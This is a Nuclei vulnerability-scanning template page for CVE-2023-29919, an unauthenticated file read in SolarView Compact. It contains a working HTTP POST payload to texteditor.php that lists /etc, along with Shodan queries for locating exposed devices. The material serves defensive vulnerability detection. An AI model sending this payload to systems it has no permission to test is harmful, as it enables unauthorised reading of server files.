Skip to content
Nuclei Templates

SolarView Compact <= 6.00 - Local File Inclusion

ID: CVE-2023-29919

Severity: critical

Author: For3stCo1d

Tags: cve,cve2023,lfi,solarview,edb,contec

Description

Section titled “Description”

There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php

YAML Source

Section titled “YAML Source”
id: CVE-2023-29919


info:
  name: SolarView Compact <= 6.00 - Local File Inclusion
  author: For3stCo1d
  severity: critical
  description: |
    There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability.
  reference:
    - https://github.com/xiaosed/CVE-2023-29919
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29919
    - https://www.solarview.io/
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-29919
    cwe-id: CWE-276
    epss-score: 0.54171
    epss-percentile: 0.97625
    cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact
    shodan-query:
      - http.html:"SolarView Compact"
      - cpe:"cpe:2.3:h:contec:solarview_compact"
  tags: cve,cve2023,lfi,solarview,edb,contec


http:
  - raw:
      - |
        POST /texteditor.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        directory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'action="texteditor.php"'
          - 'adduser.conf'
          - 'deluser.conf'
        condition: and


      - type: word
        part: header
        words:
          - "text/html"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022005ce9c5c351d4b2a42809959cb145ec4da0425a7236a078dd9f6b9b4b160b71a022100c801e289341cbb8085f1a1a1aac81fe974a2a3a4df7f841f29f6f02661a78445:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-29919.yaml"

View on Github